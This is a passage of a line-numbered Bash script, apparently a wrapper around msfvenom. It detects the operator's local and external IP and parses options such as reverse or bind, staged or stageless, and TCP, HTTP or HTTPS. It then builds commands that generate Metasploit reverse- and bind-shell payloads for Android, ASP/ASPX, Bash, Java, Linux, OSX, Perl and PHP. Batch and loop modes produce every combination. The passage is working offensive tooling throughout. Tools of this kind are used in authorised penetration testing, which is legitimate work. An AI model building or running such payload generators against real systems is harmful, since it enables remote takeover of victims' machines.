${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't find msfvenom${RESET}" >&2 283 | exit 3 284 | fi 285 | 286 | ## cURL/wget installed? 287 | if [[ -n "$( \which curl )" || -n "$( \which wget )" ]]; then 288 | ## Try and get external IP 289 | WAN="" 290 | [[ -n "$( \which curl )" ]] \ 291 | && CMD="\curl -s --max-time 3" \ 292 | || CMD="\wget -U 'curl' --connect-timeout 3 -qO-" 293 | for url in 'http://ipinfo.io/ip' 'http://ifconfig.io/'; do 294 | WAN=$( eval ${CMD} "${url}" ) 295 | [[ -n "${WAN}" ]] \ 296 | && break 297 | done 298 | [[ "${VERBOSE}" == "true" && -z "${WAN}" ]] \ 299 | && echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't get external WAN IP${RESET}" >&2 300 | fi 301 | 302 | ## Is there a writeable path for us? 303 | if [[ ! -d "${OUTPATH}" ]]; then 304 | echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Unable to use ${OUTPATH}${RESET}" >&2 305 | exit 3 306 | fi 307 | 308 | 309 | ## Get default values (before batch/loop) 310 | [[ -z "${PORT}" ]] \ 311 | && PORT="443" 312 | 313 | ## Get NIC information 314 | if [[ "$DARWIN" = "true" ]]; then # OSX users 315 | IFACE=( $( for IFACE in $( \ifconfig -l -u | \tr ' ' '\n' ); do if ( \ifconfig ${IFACE} | \grep inet 1>/dev/null ); then echo ${IFACE}; fi; done ) ) 316 | IPs=(); for (( i=0; i<${#IFACE[@]}; ++i )); do IPs+=( $( \ifconfig "${IFACE[${i}]}" | \grep 'inet ' | \grep -E '([[:digit:]]{1,2}.){4}' | \sed -e 's_[:|addr|inet]__g; s_^[ \t]*__' | \awk '{print $1}' ) ); done 317 | else # nix users 318 | IFACE=( $( \awk '/:/ {print $1}' /proc/net/dev | \sed 's_:__' ) ) 319 | IPs=(); for (( i=0; i<${#IFACE[@]}; ++i )); do IPs+=( $( \ip addr list "${IFACE[${i}]}" | \grep 'inet ' | \cut -d' ' -f6 | \cut -d '/' -f1 ) ); done 320 | fi 321 | 322 | ## Define TYPEs/FORMATs 323 | TYPEs=( apk asp aspx bash java linux osx perl php powershell python tomcat windows ) # Due to how its coded, this must always be a higher array count than ${FORMATs} 324 | FORMATs=( sh jsp lin elf macho pl ps1 py war win exe exe-service dll ) 325 | 326 | 327 | ## Check user input 328 | ## Able to detect NIC interfaces? 329 | if [[ -z "${IFACE}" ]]; then 330 | echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't find any network interfaces${RESET}" >&2 331 | echo -e " ${YELLOW}[i]${RESET} Need to manually define an IP. ${YELLOW}${0} --ip ${RESET}" >&2 332 | exit 2 333 | fi 334 | 335 | ## Able to detect IP addresses? 336 | if [[ -z "${IPs}" ]]; then 337 | echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't discover IP addresses${RESET}. =(" >&2 338 | echo -e " ${YELLOW}[i]${RESET} Need to manually define it. ${YELLOW}${0} --ip ${RESET}" >&2 339 | exit 2 340 | fi 341 | 342 | ## (!!!Magic Alert!!!) Try to predict what's what with inputs... 343 | for x in $( \tr '[:upper:]' '[:lower:]' <<< "$@" ); do 344 | if [[ "${x}" =~ ^--* ]]; then true # Long argument? (skip!) 345 | elif [[ "${x}" == "list" || "${x}" == "ls" || "${x}" == "options" || "${x}" == "show" || "${x}" == "help" ]]; then HELP=true # List types? (aka help screen) 346 | elif [[ "${x}" == "verbose" || "${x}" == "v" ]]; then VERBOSE=true # Verbose? 347 | elif [[ "${x}" == "all" || "${x}" == "batch" || "${x}" == "a" ]]; then BATCH=true # Batch mode? 348 | elif [[ "${x}" == "loop" || "${x}" == "l" ]]; then LOOP=true # Loop mode? 349 | elif [[ "${x}" == "cmd" || "${x}" == "shell" || "${x}" == "normal" ]]; then SHELL="shell" # Shell? 350 | elif [[ "${x}" == "meterpreter" || "${x}" == "msf" || "${x}" == "meterp" ]]; then SHELL="meterpreter" # Meterpreter? 351 | elif [[ "${x}" == "bind" || "${x}" == "listen" ]]; then DIRECTION="bind" # Bind payload? 352 | elif [[ "${x}" == "reverse" || "${x}" == "rev" ]]; then DIRECTION="reverse" # Reverse payload? (default) 353 | elif [[ "${x}" == "staged" || "${x}" == "stager" || "${x}" == "stage" || "${x}" == "small" ]]; then STAGE=true # Staged? 354 | elif [[ "${x}" == "stag"*"less" || "${x}" == "single" || "${x}" == "inline" || "${x}" == "no"* || "${x}" == "full" ]]; then STAGE=false # Stageless? 355 | elif [[ "${x}" == "https" || "${x}" == "ssl" || "${x}" == "tls" ]]; then METHOD="https" # HTTPS payload? 356 | elif [[ "${x}" == "http" || "${x}" == "www" ]]; then METHOD="http" # HTTP payload? 357 | elif [[ "${x}" == "tcp" ]]; then METHOD="tcp" # TCP payload? (default) 358 | elif [[ "${x}" == "find"* || "${x}" == "allport"* ]]; then METHOD="find_port" # Find_Port payload? 359 | elif [[ "${x}" =~ ^-?[0-9]+$ && "${x}" -gt 1 && "${x}" -lt 65535 ]]; then PORT="${x}" # Port? 360 | elif [[ "${x}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then IP="${x}" # IP? 361 | elif [[ "${x}" == *.* ]]; then IP="${x}" # Domain/DNS? (weak detection & doesn't support hostname) 362 | elif [[ "${x}" == "wan" && -n "${WAN}" ]]; then IP="${WAN}" # WAN interface? 363 | else 364 | known=false 365 | for (( i=0; i<${#IFACE[@]}; ++i )); do [[ "${x}" == "${IFACE[${i}]}" ]] && IP="${IPs[${i}]}" && known=true && break; done # Interface? (rather than a an IP) 366 | for (( i=0; i<${#TYPEs[@]}; ++i )); do [[ "${x}" == "${TYPEs[${i}]}" ]] && TYPE="${TYPEs[${i}]}" && known=true && break; done # Type? 367 | for (( i=0; i<${#FORMATs[@]}; ++i )); do [[ "${x}" == "${FORMATs[${i}]}" ]] && TYPE="${FORMATs[${i}]}" && known=true && break; done # Type? (aka formats) 368 | [[ "${known}" == false ]] \ 369 | && echo -e " ${YELLOW}[i]${RESET} Unable to detect value: ${RED}${x}${RESET}" \ 370 | && exit 1 # ...if we got this far, we failed. =( 371 | fi 372 | done 373 | 374 | ## If the user defined a value, overwrite it regardless 375 | while [[ "${#}" -gt 0 && ."${1}" == .-* ]]; do 376 | opt="${1}"; 377 | shift; 378 | case "$( echo ${opt} | tr '[:upper:]' '[:lower:]' )" in 379 | -|-- ) break 2;; 380 | 381 | -p|--platform ) 382 | TYPE="${1}"; shift;; 383 | --platform=* ) 384 | TYPE="${opt#*=}";; 385 | -t|--type ) 386 | TYPE="${1}"; shift;; 387 | --type=* ) 388 | TYPE="${opt#*=}";; 389 | 390 | -i|--ip ) 391 | IP="${1}"; shift;; 392 | --ip=* ) 393 | IP="${opt#*=}";; 394 | 395 | -p|--port ) 396 | PORT="${1}"; shift;; 397 | --port=* ) 398 | PORT="${opt#*=}";; 399 | 400 | -m|--msf|--meterpreter ) 401 | SHELL="meterpreter";; 402 | -c|--cmd|--shell ) 403 | SHELL="shell";; 404 | --shell ) 405 | SHELL="${1}"; shift;; 406 | --shell=* ) 407 | SHELL="${opt#*=}";; 408 | 409 | -b|--bind|--listen ) 410 | DIRECTION="bind";; 411 | -r|--rev|--reverse ) 412 | DIRECTION="reverse";; 413 | --direction ) 414 | DIRECTION="${1}"; shift;; 415 | --direction=* ) 416 | DIRECTION="${opt#*=}";; 417 | 418 | -s|--staged|--stager ) 419 | STAGE=true;; 420 | --stageless ) 421 | STAGE=false;; 422 | --stage ) 423 | STAGE="${1}"; shift;; 424 | --stage=* ) 425 | STAGE="${opt#*=}";; 426 | 427 | -t|--tcp ) 428 | METHOD="tcp";; 429 | --http|--www ) 430 | METHOD="http";; 431 | --https|--ssl|--tls ) 432 | METHOD="https";; 433 | -f|--find|--all|--find_port|--find-port|--findport|--allports|--all-ports|--all_ports ) 434 | METHOD="find_port";; 435 | --method ) 436 | METHOD="${1}"; shift;; 437 | --method=* ) 438 | METHOD="${opt#*=}";; 439 | 440 | -a|--all|--batch ) 441 | BATCH=true;; 442 | -l|--loop ) 443 | LOOP=true;; 444 | 445 | -v|--verbose ) 446 | VERBOSE=true;; 447 | 448 | -h|--help|-ls|--list|--options ) 449 | HELP=true;; 450 | 451 | *) echo -e " ${YELLOW}[i]${RESET} Invalid option: ${RED}${x}${RESET}" && exit 1;; 452 | esac 453 | done 454 | 455 | 456 | ## Display help? 457 | [[ "${HELP}" == true ]] \ 458 | && doHelp 459 | 460 | 461 | ## Check input 462 | if [[ "${SHELL}" == "shell" || "${SHELL}" == "cmd" || "${SHELL}" == "normal" ]]; then SHELL="shell" 463 | elif [[ "${SHELL}" == "meterpreter" || "${SHELL}" == "msf" || "${SHELL}" == "meterp" ]]; then SHELL="meterpreter"; fi 464 | #else SHELL="meterpreter"; fi # <--- cant due to batch mode (same with [[ -z "${SHELL}" ]]) 465 | 466 | if [[ "${DIRECTION}" == "reverse" || "${DIRECTION}" == "rev" ]]; then DIRECTION="reverse" 467 | elif [[ "${DIRECTION}" == "bind" || "${DIRECTION}" == "listen" ]]; then DIRECTION="bind"; fi 468 | 469 | if [[ "${STAGE}" == "true" || "${STAGE}" == "staged" || "${STAGE}" == "stager" || "${STAGE}" == "stage" || "${STAGE}" == "small" ]]; then STAGE='staged'; _STAGE='/' 470 | elif [[ "${STAGE}" == "false" || "${STAGE}" == "stage"*"less" || "${STAGE}" == "single" || "${STAGE}" == "inline" || "${STAGE}" == "no"* || "${STAGE}" == "full" ]]; then STAGE='stageless'; _STAGE='_'; fi 471 | 472 | if [[ "${METHOD}" == "tcp" ]]; then METHOD="tcp" 473 | elif [[ "${METHOD}" == "http" || "${METHOD}" == "www" ]]; then METHOD="http" 474 | elif [[ "${METHOD}" == "https" || "${METHOD}" == "tls" || "${METHOD}" == "ssl" ]]; then METHOD="https" 475 | elif [[ "${METHOD}" == "find"* || "${METHOD}" == "all"* ]]; then METHOD="find_port"; fi 476 | 477 | ## Did user enter an interface instead of an IP address? 478 | for (( x=0; x<${#IFACE[@]}; ++x )); do [[ "${IP}" == "${IFACE[${x}]}" ]] && IP=${IPs[${x}]} && break; done 479 | 480 | ## WAN interface? 481 | if [[ -n "${WAN}" && "${IP}" == "${WAN}" ]]; then 482 | [[ "${VERBOSE}" == "true" ]] \ 483 | && echo -e " ${YELLOW}[i]${RESET} WAN IP: ${YELLOW}${WAN}${RESET} " 484 | fi 485 | 486 | ## Valued entered for IP address? Is it a valid IPv4 address? Else assume its a domain... 487 | if [[ "${IP}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then 488 | for (( i=1; i<${#BASH_REMATCH[@]}; ++i )); do 489 | (( ${BASH_REMATCH[${i}]} <= 255 )) || { echo -e " ${YELLOW}[i]${RESET} IP (${IP}) appears to be a ${RED}invalid IPv4 address${RESET} =(" >&2 && exit 3; } 490 | done 491 | elif [[ -n "${IP}" ]]; then 492 | echo -e " ${YELLOW}[i]${RESET} ${IP} isn't a IPv4 address. ${YELLOW}Assuming its a domain name${RESET}..." 493 | DOMAIN=true 494 | fi 495 | 496 | ## Valid port? 497 | if [[ "${PORT}" -lt 1 || "${PORT}" -gt 65535 ]]; then 498 | echo -e " ${YELLOW}[i]${RESET} PORT (${PORT}) is incorrect. Needs to be ${YELLOW}between 1-65535${RESET}" >&2 499 | exit 3 500 | fi 501 | 502 | 503 | ## IP menu 504 | if [[ -n "${TYPE}" && -z "${IP}" ]]; then 505 | echo -e "\n ${YELLOW}[i]${RESET} Use which ${BLUE}interface${RESET} - ${YELLOW}IP address${RESET}?:" 506 | I=0 507 | for iface in "${IFACE[@]}"; do 508 | IPs[${I}]="$( \ifconfig "${iface}" | \grep 'inet ' | \grep -E '([[:digit:]]{1,2}.){4}' | \sed -e 's_[:|addr|inet]__g; s_^[ \t]*__' | \awk '{print $1}' )" 509 | [[ -z "${IPs[${I}]}" ]] \ 510 | && IPs[${I}]="$( \ifconfig "${iface}" | \grep 'inet addr:' | \cut -d':' -f2 | \cut -d' ' -f1 )" 511 | [[ -z "${IPs[${I}]}" ]] \ 512 | && IPs[${I}]="UNKNOWN" 513 | echo -e " ${YELLOW}[i]${RESET} ${GREEN}$[${I}+1]${RESET}.) ${BLUE}${iface}${RESET} - ${YELLOW}${IPs[${I}]}${RESET}" 514 | I=$[${I}+1] 515 | done 516 | [[ -n "${WAN}" ]] \ 517 | && I=$[${I}+1] \ 518 | && echo -e " ${YELLOW}[i]${RESET} ${GREEN}$[${I}]${RESET}.) ${BLUE}wan${RESET} - ${YELLOW}${WAN}${RESET}" 519 | _IP="" 520 | while [[ -z "${_IP}" ]]; do 521 | echo -ne " ${YELLOW}[?]${RESET} Select ${GREEN}1-${I}${RESET}, ${BLUE}interface${RESET} or ${YELLOW}IP address${RESET}"; read -p ": " INPUT 522 | for (( x=0; x<${I}; ++x )); do [[ "${INPUT}" == "${IFACE[${x}]}" ]] && _IP="${IPs[${x}]}"; done # Did user enter interface? 523 | [[ -n "${WAN}" && "${INPUT}" == "${INPUT}" ]] && _IP="${WAN}" # Did user enter wan? 524 | [[ "${INPUT}" != *"."* && "${INPUT}" -ge 1 && "${INPUT}" -le "${I}" ]] && _IP="${IPs[${INPUT}-1]}" # Did user select number? 525 | #for ip in "${IPs[@]}"; do [[ "${INPUT}" == "${ip}" ]] && _IP="${ip}"; done # Did user enter a known IP? 526 | [[ "${INPUT}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] && _IP="${INPUT}" # Did the user enter a IP address (doesn't valid it) 527 | IP="${_IP}" 528 | done 529 | echo "" 530 | fi 531 | 532 | 533 | ## Generate #1 (Batch/Looping) 534 | ## Loop mode? 535 | if [[ "${LOOP}" == "true" ]]; then 536 | echo -e " ${YELLOW}[i]${RESET} Loop Mode. ${BOLD}Creating one of each TYPE${RESET}, with default values" 537 | [[ "${VERBOSE}" == "true" ]] \ 538 | && _VERBOSE="verbose" 539 | for (( i=0; i<${#TYPEs[@]}; ++i )); do 540 | echo "" # "${TYPEs[${i}]}" "${IP}" "${PORT}" "${_VERBOSE}" 541 | eval "${0}" "${TYPEs[${i}]}" "${IP}" "${PORT}" "${_VERBOSE}" # chmod +x ${0} 542 | echo "" 543 | done # for TYPEs[@] 544 | echo "" 545 | eval "${0}" "dll" "${IP}" "${PORT}" "${_VERBOSE}" #... the odd one out! 546 | echo "" 547 | elif [[ "${BATCH}" == "true" ]]; then 548 | echo -e " ${YELLOW}[i]${RESET} Batch Mode. ${BOLD}Creating as many different combinations as possible${RESET}" 549 | [[ "${VERBOSE}" == "true" ]] \ 550 | && _VERBOSE="verbose" 551 | for (( i=0; i<${#TYPEs[@]}; ++i )); do 552 | if [[ -z "${TYPE}" || "${TYPEs[${i}]}" == "${TYPE}" || "${FORMATs[${i}]}" == "${TYPE}" ]]; then 553 | type="${TYPEs[${i}]}" 554 | [[ -n "${TYPE}" && "${FORMATs[${i}]}" == "${TYPE}" ]] && type="${FORMATs[${i}]}" 555 | for shell in "meterpreter" "shell"; do 556 | if [[ -z "${SHELL}" || "${shell}" == "${SHELL}" ]]; then 557 | for direction in "reverse" "bind"; do 558 | if [[ -z "${DIRECTION}" || "${direction}" == "${DIRECTION}" ]]; then 559 | for staged in "staged" "stageless"; do 560 | if [[ -z "${STAGE}" || "${staged}" == "${STAGE}" ]]; then 561 | for method in "tcp" "http" "https" "find_port"; do 562 | if [[ -z "${METHOD}" || "${method}" == "${METHOD}" ]]; then 563 | echo "" # "${type}" "${IP}" "${PORT}" "${direction}" "${staged}" "${method}" "${shell}" "${_VERBOSE}" 564 | eval "${0}" "${type}" "${IP}" "${PORT}" "${direction}" "${staged}" "${method}" "${shell}" "${_VERBOSE}" # chmod +x ${0} 565 | echo "" 566 | fi # "${method}" == "${METHOD}" 567 | done # for protocol 568 | fi # "${staged}" == "${STAGE}" 569 | done # for staged 570 | fi # "${direction}" == "${DIRECTION}" 571 | done # for direction 572 | fi # "${shell}" == "${SHELL}" 573 | done # for shell 574 | echo -e "\n" 575 | fi # "${TYPEs[${i}]}" == "${TYPE}" 576 | done # for TYPEs[@] 577 | fi 578 | 579 | 580 | ## Set default values (after batch/loop) 581 | [[ -z "${METHOD}" ]] \ 582 | && METHOD="tcp" 583 | [[ -z "${DIRECTION}" ]] \ 584 | && DIRECTION="reverse" 585 | 586 | ## Valid shell? 587 | if [[ -n "${TYPE}" && "${SHELL}" != "shell" && "${SHELL}" != "meterpreter" && -n "${SHELL}" ]]; then 588 | echo -e " ${YELLOW}[i]${RESET} SHELL (${SHELL}) is incorrect. Needs to be either ${YELLOW}shell${RESET} or ${YELLOW}meterpreter${RESET}" >&2 589 | exit 3 590 | fi 591 | 592 | ## Valid staged? 593 | if [[ -n "${TYPE}" && "${STAGE}" != "staged" && "${STAGE}" != "stageless" && -n "${STAGE}" ]]; then 594 | echo -e " ${YELLOW}[i]${RESET} STAGED (${STAGE}) is incorrect. Needs to be either ${YELLOW}staged${RESET} or ${YELLOW}stageless${RESET}" >&2 595 | exit 3 596 | elif [[ -n "${TYPE}" && "${_STAGE}" != "/" && "${_STAGE}" != "_" && -n "${STAGE}" ]]; then # "${STAGE}" != "" is correct 597 | echo -e " ${YELLOW}[i]${RESET} ${RED}Something went wrong (Internally) with stage: ${_STAGE}.${RESET}" 598 | exit 2 599 | fi 600 | 601 | ## If its not reverse (bind), the only option is tcp (not http/https/find_ports) 602 | if [[ "${DIRECTION}" != "reverse" && "${METHOD}" != "tcp" ]]; then 603 | echo -e " ${YELLOW}[i]${RESET} Unable to use ${METHOD} with ${DIRECTION}. Please ${YELLOW}switch to reverse${RESET}" >&2 604 | exit 3 605 | fi 606 | 607 | 608 | ## Bind shell does not use LHOST 609 | LHOST="" 610 | [[ "${DIRECTION}" == "reverse" ]] \ 611 | && LHOST="LHOST=${IP}" 612 | 613 | 614 | ## Generate #2 (Single Payload) 615 | ## APK 616 | if [[ "${TYPE}" == "apk" ]]; then 617 | [[ -z "${SHELL}" ]] \ 618 | && SHELL="meterpreter" 619 | [[ -z "${STAGE}" ]] \ 620 | && STAGE="stageless" \ 621 | && _STAGE="/" 622 | [[ "${METHOD}" == "find_port" ]] \ 623 | && METHOD="allports" 624 | TYPE="android" 625 | FILEEXT="apk" 626 | PAYLOAD="android/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" 627 | CMD="msfvenom -p ${PAYLOAD} \\\\\n ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'" 628 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" 629 | 630 | 631 | ## ASP 632 | elif [[ "${TYPE}" == "asp" ]]; then 633 | [[ -z "${SHELL}" ]] \ 634 | && SHELL="meterpreter" 635 | [[ -z "${STAGE}" ]] \ 636 | && STAGE="staged" \ 637 | && _STAGE="/" 638 | [[ "${METHOD}" == "find_port" ]] \ 639 | && METHOD="allports" 640 | # Can't do: stageless meterpreter - The EXE generator now has a max size of 2048 bytes, please fix the calling module 641 | if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then 642 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} ASP. The result is over Metasploit's ${RED}file size limit${RESET}. =(" >&2 643 | #[[ "${VERBOSE}" != 'true' ]] && exit 5 # Force pass the warning? 644 | fi 645 | TYPE="windows" 646 | FILEEXT="asp" 647 | PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" 648 | CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} \\\\\n --platform ${TYPE} -a x86 -e generic/none ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'" 649 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" 650 | 651 | ## ASPX 652 | elif [[ "${TYPE}" == "aspx" ]]; then 653 | [[ -z "${SHELL}" ]] \ 654 | && SHELL="meterpreter" 655 | [[ -z "${STAGE}" ]] \ 656 | && STAGE="staged" \ 657 | && _STAGE="/" 658 | [[ "${METHOD}" == "find_port" ]] \ 659 | && METHOD="allports" 660 | # Its able todo anything that you throw at it =). 661 | TYPE="windows" 662 | FILEEXT="aspx" 663 | PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" 664 | CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} \\\\\n --platform ${TYPE} -a x86 -e generic/none ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'" 665 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" 666 | 667 | ## Bash 668 | elif [[ "${TYPE}" == "bash" || "${TYPE}" == "sh" ]]; then 669 | [[ -z "${SHELL}" ]] \ 670 | && SHELL="shell" 671 | [[ -z "${STAGE}" ]] \ 672 | && STAGE="staged" \ 673 | && _STAGE="/" 674 | # Can't do: meterpreter or stageless - Invalid Payload Selected 675 | # Can't do: bind option // http, https or find_port options 676 | if [[ "${STAGE}" == "stageless" ]]; then 677 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE}. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 678 | elif [[ "${SHELL}" == "meterpreter" ]]; then 679 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} Bash. There ${RED}isn't a Bash ${SHELL}${RESET}...yet?" >&2 680 | elif [[ "${DIRECTION}" != "reverse" ]]; then 681 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${DIRECTION}. There ${RED}isn't a ${DIRECTION} Bash${RESET}...yet?" >&2 682 | fi 683 | TYPE="bash" 684 | FILEEXT="sh" 685 | PAYLOAD="cmd/unix${_STAGE}${DIRECTION}_bash" 686 | CMD="msfvenom -p ${PAYLOAD} -f raw \\\\\n --platform unix -e generic/none -a cmd ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'" 687 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" 688 | 689 | ## Java 690 | elif [[ "${TYPE}" == "java" || "${TYPE}" == "jsp" ]]; then 691 | [[ -z "${SHELL}" ]] \ 692 | && SHELL="meterpreter" 693 | [[ -z "${STAGE}" ]] \ 694 | && STAGE="staged" \ 695 | && _STAGE="/" 696 | # Can't do: stageless meterpreter - Invalid Payload Selected 697 | if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then 698 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Java. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 699 | fi 700 | TYPE="java" 701 | FILEEXT="jsp" 702 | PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" 703 | CMD="msfvenom -p ${PAYLOAD} -f raw \\\\\n --platform ${TYPE} -e generic/none -a ${TYPE} ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'" 704 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" 705 | 706 | ## Linux 707 | elif [[ "${TYPE}" == "linux" || "${TYPE}" == "lin" || "${TYPE}" == "elf" ]]; then 708 | [[ -z "${SHELL}" ]] \ 709 | && SHELL="shell" 710 | [[ -z "${STAGE}" ]] \ 711 | && STAGE="staged" \ 712 | && _STAGE="/" 713 | # Can't do: stageless meterpreter - Invalid Payload Selected 714 | if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then 715 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Linux. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 716 | fi 717 | TYPE="linux" 718 | FILEEXT="elf" #bin 719 | PAYLOAD="${TYPE}/x86/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" 720 | CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} \\\\\n --platform ${TYPE} -a x86 -e generic/none ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'" 721 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" 722 | 723 | ## OSX 724 | elif [[ "${TYPE}" == "osx" || "${TYPE}" == "macho" ]]; then 725 | [[ -z "${SHELL}" ]] \ 726 | && SHELL="shell" 727 | [[ -z "${STAGE}" ]] \ 728 | && STAGE="stageless" \ 729 | && _STAGE="_" 730 | # Can't do: meterpreter or stageless - Invalid Payload Selected 731 | if [[ "${STAGE}" == "staged" ]]; then 732 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} OSX. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 733 | elif [[ "${SHELL}" == "meterpreter" ]]; then 734 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} OSX. There ${RED}isn't a OSX Meterpreter${RESET}...yet." >&2 735 | fi 736 | TYPE="osx" 737 | FILEEXT="macho" 738 | PAYLOAD="osx/x86/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" 739 | CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} \\\\\n --platform ${TYPE} -a x86 -e generic/none ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'" 740 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" 741 | 742 | ## Perl 743 | elif [[ "${TYPE}" == "perl" || "${TYPE}" == "pl" ]]; then 744 | [[ -z "${SHELL}" ]] \ 745 | && SHELL="shell" 746 | [[ -z "${STAGE}" ]] \ 747 | && STAGE="staged" \ 748 | && _STAGE="/" 749 | # Can't do: meterpreter or stageless - Invalid Payload Selected 750 | if [[ "${STAGE}" == "stageless" ]]; then 751 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} PERL. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 752 | elif [[ "${SHELL}" == "meterpreter" ]]; then 753 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} PERL. There ${RED}isn't a PERL Meterpreter${RESET}...yet." >&2 754 | fi 755 | TYPE="linux" 756 | FILEEXT="pl" 757 | PAYLOAD="cmd/unix${_STAGE}${DIRECTION}_perl" 758 | CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} \\\\\n --platform unix -a cmd -e generic/none ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'" 759 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" 760 | 761 | ## PHP 762 | elif [[ "${TYPE}" == "php" ]]; then 763 | [[ -z "${SHELL}" ]] \ 764 | && SHELL="meterpreter" 765 | [[ -z "${STAGE}" ]] \ 766 | && STAGE="staged" \ 767 | && _STAGE="/" 768 | # Can't do: shell - Invalid Payload Selected 769 | if [[ "${SHELL}" == "shell" ]]; then 770 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} PHP. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 771 | fi 772 | TYPE="php" 773 | FILEEXT="php" 774 | PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" 775 | CMD="msfvenom -p ${PAYLOAD} -f raw \\\\\n --platform ${TYPE} -e generic/none -a ${TYPE} ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'" 776 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" 777 | 778 | ## Powershell 779 | elif [[ "${TYPE}" == "powershell" || "${TYPE}" == "ps1" ]]; then 780 | [[ -z "${SHELL}" ]] \ 781 | && SHELL="meterpreter" 782 | [[ -z "${STAGE}" ]] \ 783 | && STAGE="stageless" \ 784 | && _STAGE="_" 785 | [[ "${METHOD}" == "find_port" ]] \ 786 | && METHOD="allports" 787 | TYPE="windows" 788 | 